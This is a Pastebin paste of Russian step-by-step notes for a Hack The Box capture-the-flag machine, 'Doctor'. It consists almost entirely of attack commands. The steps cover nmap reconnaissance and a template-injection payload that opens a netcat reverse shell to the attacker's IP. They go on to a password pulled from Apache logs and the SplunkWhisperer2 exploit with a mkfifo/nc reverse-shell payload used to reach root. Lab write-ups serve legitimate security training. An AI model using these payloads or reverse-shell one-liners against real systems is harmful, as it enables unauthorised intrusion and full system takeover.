Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Manual https://www.youtube.com/watch?v=GZDo8xylr2o
- Открываем терминал
- cd Desktop/
- sudo openvpn askanton.ovpn
- Делим терминал горизонтально
- ping 10.10.10.209
- открываем новый терминал
- sudo nmap -A 10.10.10.209
- находим 80-й порт и отріваем адрес в браузере
- находим сайт
- Смотрим сорс
- Проверяем результат nmap, находим doctors.htb
- nano /etc/hosts
- 10.10.10.209 doctors.htb
- открываем doctors.htb
- Проходим регистрацию
- логинимся
- Смотрим сорс
- находим archive, открываем
- Смотрим сорс
- Создаем сообщение
- Проверяем возможность иньекции
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
- ${7*7}
- sudo ifconfig
- Пытаемся получить обратную консоль
- nc -lvp 7777
- <img src=http://10.10.14.105/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.105'$IFS'7777')>
- смотрим где мы
- hostname
- python3 -c 'import pty; pty.spawn("/bin/bash")'
- cd /home
- ls
- находим пользователя shaun
- cd /shaun
- cat uset.txt
- Ищем информацию
- сd /etc
- ls
- cat passwd
- cd /var
- ls
- cd log
- ls
- cd apache2
- ls
- cat backup | grep pass
- Получаем пароль Guitar123
- su shaun
- Guitar123
- Получаем ключ пользователя
- cat /home/shaun/user.txt
- Ищем уязвимости спланка
- https://github.com/cnotin/SplunkWhisperer2
- git clone https://github.com/cnotin/SplunkWhisperer2
- cd SplunkWhisperer2
- ls
- cd PySplunkWhisperer2
- Слушаем еще один порт
- nc -lvp 7778
- python3 PySplunkWhisperer2_remote.py --lhost 10.10.14.105 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/void;mkfifo /tmp/void;cat /tmp/void|/bin/sh -i 2>&1|nc 10.10.14.105 7778 >/tmp/void"'
- hostname
- python3 -c 'import pty; pty.spawn("/bin/bash")'
- cd /root
- ls
- cat root.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement